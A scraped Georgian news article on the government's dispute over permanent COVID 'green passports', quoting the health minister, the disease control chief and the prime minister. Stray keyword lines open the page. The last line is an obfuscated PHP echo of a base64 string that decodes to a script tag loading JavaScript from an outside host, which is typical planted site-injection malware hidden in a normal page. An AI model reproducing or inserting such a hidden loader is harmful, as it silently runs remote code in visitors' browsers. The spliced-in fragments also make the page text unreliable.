celsiusi
ავერსი საქკაბელი
ის, რომ მოქალაქეთა გარკვეული კატეგორიისთვის მუდმივი მწავნე პასპორტის მინიჭება პრემიერ მინისტრის პირადი გადაწყვეტილებაა, ამაზე საკოორდინაციო საბჭოს წევრების მხრიდან გაკეთებულ განცხადებები მეტყველებს. 
 
გუშინ, რუსთავი 2-თან ინტერვიუში ჯანდაცვის მინისტრმა ღიად პირველად დააფიქსირა პოზიცია, რომ ის, როგორც მინისტრი უვადო მწვანე პასპორტის კონცეფციას არ ემხრობა. 
 
"ვერ ვიტყვი იმას, რომ ჯანდაცვის სამინისტროსა და დაავადებათა კონტროლის ცენტრს, რომლებიც მთავარი უწყებები არიან და იძლევიან რეკომენდაციებს ამ მიმართულებით, სრულად იზიარებენ ამ გადაწყვეტილებას. ეს, რა თქმა უნდა, გარკვეულ რისკებს შეიცავს, მაგრამ აქ არსებობს სხვა საფუძველიც. ვინაიდან ამ ეტაპზე ჩვენთვის მნიშვნელოვანია, რომ სწორად და უსაფრთხოდ დაინერგოს "მწვანე პასპორტები", თუმცა გარკვეული გამოწვევების შედეგად მასთან მიმართებაში რეგულაციები შეიცვლება. კერძოდ, განიხილება ყველა სახის ცვლილება დამდგარი საჭიროებებიდან გამომდინარე, რასთან დაკავშირებითაც ჯანდაცვის სამინისტრო და დაავადებათა კონტროლის ცენტრი დამატებით რეკომენდაციებს წარუდგენს საბჭოს. მე, როგორც ჯანდაცვის მინისტრი, "მწვანე პასპორტის" უვადობას არ ვემხრობი," - განაცხადა ტიკარაძემ.
 
დღეს კი დაავადებათა კონტროლის ეროვნული ცენტრის ხელმძღვანელმა კიდევ ერთხელ დააფიქსირა პოზიცია, რომ პასპორტი უვადო არ შეიძლება იყოს, მითუმეტეს როცა ახლა ახალი შტამების გავრცელების მხრივ სხვაგავარი სიტუაციაა.
 
"ახლა ახალი რეალობაა „ომიკრონთან“ დაკავშირებით და კიდევ ერთხელ დავაფიქსირებ, რომ ეს პოზიცია უნდა გადაიხედოს, რომ უვადო არ შეიძლება იყოს პასპორტი“, – განაცხადა გამყრელიძემ.
 
ის, რომ მუდმივი მწავნე პასპორტები მთავრობის მეთაურის იდეაა, ამას ღარიბაშვილის 24 ნოემბერს გაკეთებული განცხადებაც ადასტურებს, სადაც ის პირდაპირ ამბობს, რომ საბჭოზე წარდგენილი გეგმა მან "შეამსუბუქა". 
 
"მე წარმომიდგინეს გეგმა, სადაც უფრო რთული ვარიანტები იყო წარმოდგენილი და მე შევამსუბუქე და მოვარგე არსებულ რეალობას და მოსახლეობის განწყობებს, რათა დაბალანდებული მიდგომა ყოფილიყო და ვფიქრობ, საკმაოდ დაბალანსებული მიდგომა გვაქვს “, - განაცხადა ირაკლი ღარიბაშვილმა.
1571
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");